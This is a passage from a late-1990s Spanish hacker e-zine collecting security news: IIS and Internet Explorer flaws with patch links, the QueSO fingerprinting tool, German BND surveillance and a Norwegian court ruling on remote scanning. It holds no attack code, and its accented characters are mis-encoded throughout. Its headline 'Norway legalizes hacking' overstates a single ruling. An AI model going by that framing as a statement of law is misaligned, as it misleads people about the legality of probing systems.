mientras que en ocasiones es necesario reinicializar la mßquina. N≤tese que
esta vulnerabilidad no afecta a los datos albergados en el servidor ni
permite usurpar privilegios, causando exclusivamente la caφda temporal del
servidor.
Parches:
- Para IIS 3.0 en X86:
ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget3i.exe
- Para IIS 4.0 en X86:
ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget4i.exe
- Para IIS 3.0 en Alpha:
ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget3a.exe
- Para IIS 4.0 en Alpha:
ftp://ftp.microsoft.com/bussys/iis/iis-public
/fixes/usa/security/Infget-fix/infget4a.exe
(Nota: los URLs han sido deliberadamente partidos en dos lφneas cada uno)
Para mßs informaci≤n:
- Boletφn de seguridad de Microsoft 98-019,
http://www.microsoft.com/security/bulletins/ms98-019.asp.
***********************************************************************************************
China condena a muerte a dos hackers por robar a un banco
http://cnn.com/WORLD/asiapcf/9812/28/BC-CHINA-HACKERS.reut/
PARA LOS ESPA╤OLES
El teniente anselmo del moral se ha idoo sif sif ahora ahy uno nuevo,
mirar sus declaraciones.. son de risa :o)
Para Θl, los "hackers" son -arruga la nariz- "filosofφa anglosajona, es
todo muy peliculero" y no duda en afirmar que "hay que estar loco para
estar 24 horas ante el ordenador", aunque cree que la mayorφa de
delicuentes de la red "son mßs pillos que tΘcnicos". ┐Su direcci≤n
preferida? "La pßgina de la Guardia Civil". ┐Aunque la tumben los
æhackersÆ? "Del servidor, no nos encargamos nosotros sino otro
departamento", sonrφe.
***********************************************************************************************
>UN PROGRAMA CATAL┴N CAUSA EL P┴NICO EN ISRAEL
>
>MercΦ Molist
>"QueSO" es la contracci≤n de "┐QuΘ Sistema Operativo?" y un inteligente
programa creado por Jordi Murg≤, miembro del selecto club de "gur·s"
informßticos, "Els Ap≥stols". QueSO envφa peque±os paquetes incorrectos de
datos a una mßquina y, a partir de los paquetes que Θsta devuelve como
respuesta, es posible conocer su sistema operativo.
>Esta herramienta, usada por auditores de seguridad de todo el mundo y
ßmpliamente probada en muchos equipos, es tambiΘn la base del "Internet
Operating System Counter", una estadφstica mensual sobre mßs de 940.000
ordenadores europeos conectados a la red, para dirimir cual es el sistema
operativo mßs implantado en el continente (Linux gana por mayorφa).
>Los problemas para este sondeo y su promotor, Hans Zoebelein, afincado en
Alemania, llegaron a principios de noviembre: una empresa de Israel, donde
tambiΘn se hace la estadφstica, ya que este paφs entra dentro del RIPE
(RΘseaux IP EuropΘens), le acus≤ de haber intentado un ataque contra sus
mßquinas. Zoebelein se afan≤ en explicar que lo que parecφa un "port
scanning" (escaneo de puertos, usado por los "hackers" para saber si hay
alguno vulnerable) no era mßs que el inocente "QueSO" en acci≤n. Pero ya
era tarde.
>24 horas despuΘs, dos empresas de seguridad, Comsec y Publicom, lanzaban
la alarma, asegurando que centenares de mßquinas israelianas, incluyendo
bancos, lugares militares y compa±φas de alta tecnologφa, habφan sido
escaneadas para ser "hackeadas", que los piratas habφan traspasado incluso
un cortafuegos de la reputada marca Checkpoint y que el ataque, "intenso y
de alto nivel", provenφa de un ordenador llamado leb.net, sito en Estados
Unidos y mantenido por "hackers" libaneses.
>Rßpidamente, los peri≤dicos del paφs se hicieron eco de la noticia, con
titulares como "Un libanΘs residente en Estados Unidos ataca lugares
israelφes en Internet" o "Un terrorista alemßn y la guerrilla libanesa,
contra la Inteligencia Israeliana". La ·nica verdad en todo el embrollo era
que, efectivamente, el sondeo se realiza desde el servidor de Texas
leb.net, concretamente y para mßs "inri" desde la mßquina beirut.leb.net.
>Pasado el temporal, Zoebelein ha parado su estadφstica mensual, "de
momento", seg·n dice: "Lo hacφa por diversi≤n pero, ahora, no tengo ganas
ni de mirar el c≤digo de los archivos que ya habφa recogido". Por su parte,
Jordi Murg≤, el autor del "QueSO", asegura que Θste es "totalmente
inofensivo" y que es imposible que haya conseguido traspasar un
cortafuegos: "Es todo mentira, nunca habφa tenido una pega, hasta ahora. No
pienso cambiar nada del programa porque es todo una paranoia; las empresas
de seguridad israelianas debφan necesitar publicidad y por eso hicieron que
cundiese el pßnico".
>
>The Internet Operating System Counter.
Http://www.hzo.cubenet.de/ioscount
>QueSO
>
http://www.apostols.org/projectz/queso
>
***********************************************************************************************
* 22 de Diciembre:
El ingeniero espa±ol Juan Carlos Garcφa Cuartango comunica el
nacimiento del "Nieto del Agujero de Cuartango", que pone en evidencia
la fragilidad del segundo parche elaborado por Microsoft para este
persistente fallo:
http://pages.whowhere.com/computers/cuartangojc/gson2.html
* 23 de Diciembre:
Microsoft anuncia la publicaci≤n de un nuevo parche para el denominado
"Frame Spoof", nueva debilidad que permite a un sitio web
malintencionado hacer aparecer un marco ('frame') falso en el
navegador de sus visitantes cuando visiten una pßgina que contenga
'frames' autΘnticos. El atacante pide a los usuarios cualquier tipo de
informaci≤n a travΘs del 'frame' falso (que el usuario cree pertenece
al sitio legφtimo), y Θsta es enviada de vuelta al impostor. TambiΘn
opera vφa e-mail y el navegador de Netscape (y posiblemente otros) es
tan susceptible como -al menos hasta ahora- el de Microsoft.
Descubridores del fallo, con pßgina de demostraci≤n:
http://www.securexpert.com/framespoof/
La informaci≤n oficial de Microsoft estß disponible en:
http://www.microsoft.com/security/bulletins/ms98-020.asp
Parches para Explorer:
http://www.microsoft.com/windows/ie/security/spoof.asp
Microsoft anuncia que este parche soluciona tambiΘn el "Nieto del
Agujero de Cuartango", y emplaza a los usuarios a instalarlo cuanto
antes.
Como dato curioso, el comunicado oficial de Microsoft agradece
expresamente a Cuartango su continuada colaboraci≤n en la detecci≤n y
soluci≤n de estos problemas.
***********************************************************************************************
Los servicios secretos alemanes espian 700 llamadas diarias Los servicios de
escucha del espionaje aleman BND) intervienen una media diaria de 700
llamadas telefonicas y acceden via satelite a los mensajes telex y fax
enviados por otros tantos ciudadanos elegidos mas o menos al azar.
Agencias - Segun el semanario "Der Spiegel", la oreja electronica de los
servicios secretos ha captado, al amparo de la legalidad que le proporciona
la Ley de Escuchas de 1994, alrededor de 13.419 telex y faxes entre julio de
1997 y abril de 1998.
El objetivo de esa practica, a la que se someten sin saberlo particulares y
empresas, nacionales y extranjeros, diplomaticos y turistas, se resume en
palabras como plutonio, terrorismo, armas, narcotrafico o blanqueo de
dinero.
"Si nos quitaran esa posibilidad nos quedariamos parcialmente ciegos" arguyo
el nuevo presidente del BND, August Hannig, el hombre elegido por el
canciller federal, Gerhard Schroeder, para hacer de los servicios secretos
un cuerpo "mas transparente y eficaz ante los desafios que surgidos con la
descomposicion de los bloques".
La posibilidad referida por Hannig esta desde el pasado dia 18 en manos del
Tribunal Constitucional, instancia con sede en la ciudad de Karslruhe a la
que han acudido un catedratico de Derecho Penal de Hamburgo y dos
periodistas que ven en las practicas del BND una violacion de los derechos
que les garantiza la Constitucion.
Los magistrados de Karlsruhe se pronunciaran a principios de a±o acerca de
la constitucionalidad de las practicas del espionaje aleman, que con un
total de 60.000 agentes, ocupan el cuarto lugar en importancia del mundo,
tras EEUU, Gran Breta±a e Israel.
Se calcula que de ese total de colaboradores, unos 1.450 se dedican de forma
exclusiva a la exploracion electronica, practica para la que el BND cuenta
en suelo federal con diez estaciones, mientras que para los puestos en el
exterior maneja un presupuesto de 70 millones de marcos (unos 42 millones de
dolares).
De las diez bases en suelo aleman, el BND comparte con los servicios
secretos de EEUU la ubicada en Bad Aibling (sur del pais).
Este no es sin embargo el unico ejemplo de la colaboracion que existe entre
ambos servicios, pues la joya del espionaje electronico germano y gracias a
la cual ha logrado obtener los codigos secretos utilizados en sus mensajes
por una docena de embajadas extranjeras en Bonn es el ordenador
estadounidense "Cary Supercomputer".
Segun la ley de 1994 que revisa el Tribunal Constitucional, el BND esta
obligado a informar de sus actividades de escucha al denominado
G-10 -comision parlamentaria de composicion secreta-, y a la autoridad
correspondiente en caso de la presuncion de delitos.
Durante la vista de diciembre en Karlsruhe quedo sin embargo de manifiesto
que ni se informa con transparencia al G-10 ni tampoco a la Fiscalia,
criticas que fueron contestadas por el BND con el argumento, ya tradicional,
de que en esas escuchas no sedetecto nada de relevancia.
Las cifras hablan en favor de los servicios de escucha, pues de los 13.419
faxes captados entre julio de 1997 y abril de este a±o, solo cuatro se
trasladaron a la autoridades policiales correspondientes, es decir el 0,03
por ciento.
En ese mismo periodo, el BND estudio asimismo un total de 2.494 telex que
posiblemente podrian contener informacion terrorista, pero en ninguno de
ellos encontraron los expertos informacion relevante.
"Nunca hay nada", titularon algunos medios de comunicacion, que cargaron sus
plumas de ironia para pedir de cara al siglo XXI unos servicios secretos
"mas transparentes" y sobre todo "mas eficaces".
Una de las pocas victorias conocidas del BND se remonta a la pasada decada,
cuando en el marco de sus actividades de escucha descubrieron a tiempo para
evitarlo que empresarios alemanes no demasiado escrupulosos colaboraban con
el proyecto de una planta de gases venenosos en Rabita, Libia.
La informacion salio a la luz publica y el diario "New York Times" la
recogio con el titulo: "Auschwitz en el desierto".
Al tomar posesion de su cargo como presidente del BND el pasado dia 17,
Hanning, dijo que el campo de actuacion de los servicios secretos de un
Estado democratico esta perfectamente delimitado y adelanto que sera en ese
espacio donde se realizaran los cambios estrategicos necesarios para adecuar
el servicio a los desafios que abre el siglo XXI.
La primera indicacion de cambio se producira en Berlin, donde el BND preve
reforzar su presencia con motivo del traslado del Gobierno federal a esa
ciudad el proximo a±o.
Hanning, a peticion del nuevo Ejecutivo socialdemocrata-verde, destacara en
Berlin 200 agentes, 174 mas de los que el BND ha mantenido todo este tiempo
en Bonn.
***********************************************************************************************
NORUEGA LEGALIZA EL HACKING
El Tribunal Supremo de Noruega ha decido que explorar de forma remota
ordenadores conectados a Internet no es un crimen.
Esta decisi≤n sienta el precedente de que cualquier sistema conectado
a
Internet (al menos los que se encuentren en Noreuega) pueden ser
examinados legalmente buscando fallos en la seguridad.
La decisi≤n se deriva de un caso presentado por la Universidad de
Oslo
frente a una compa±φa de seguridad privada, Norman Data Defence
Systems
(NDDS). NDDS habφa sido contratada por un servicio de noticias noruego
para hallar agujeros de seguridad en sistemas conectados a Internet
para un programa de televisi≤n.
La compa±φa us≤ un n·mero estßndar de tΘcnicas para comprobar la
seguridad del sistema de correo electr≤nico de la universidad y
determinar quien estaba conectado a los ordenadores de la instituci≤n.
NDDS afirma que los tests se realizaron simplemente para ver quΘ
informaci≤n puede obtenerse utilizando protocolos estßndar de
Internet.
No se accedi≤ a ning·n dato personal.
Sin embargo, la Universidad decidi≤ llevar a los tribunales a la NDDS
y
al ingeniero concreto que llev≤ a cabo los tests. Tanto la compa±φa
como
el ingeniero fueron declarados culpables de intento de entrada ilegal
y
de abuso de recursos informßticos a los que no tenφan derecho de
acceso. Se puso una multa a la NDDS y se les orden≤ pagar por la
reparaci≤n de la red de la Universidad.
Una primera apelaci≤n consigui≤ retirar la acusaci≤n de entrada ilegal
y
ahora, en una segunda apelaci≤n, el Tribunal Supremo de Noruega ha
retirado tambiΘn el cargo de abuso de recursos informßticos.
"La esencia de la decisi≤n es que si quieres unirte a Internet, has de
asegurarte de que estßs protegido", dijo el representante de la NDDS
Gunnel Wullstein. "Si no quieres que te visiten, cierra tus ports".
***********************************************************************************************
((((((((((((((ZeD-wOrLd-EzInE numero 5)))))))))))))))))))))))))))))))))))))))))))))))))))))))))
*********************
╨35P3╨1╨A y C13Rr3 *
*********************
Bueno pues este numero tengo que reconocer que ha sido algo mas corto que los anteriores,
pero nadie me podra negar que los contenidos merecen la pena.
Espero que os aya gustado y que colaboreis con los proximos numeros.
Tambien espero que ayais pasado unas felices fiestas de navidad que los reyes "majos" o
"el padre de noel" os ayan traido muchas cosas y todo eso que se dice por estas fechas,
feliz navidad y prospero nuevo hackeo.
ByEz------->ZeD
[email protected]
http://www.angelfire,com/ak/HACKZED/ZED2.html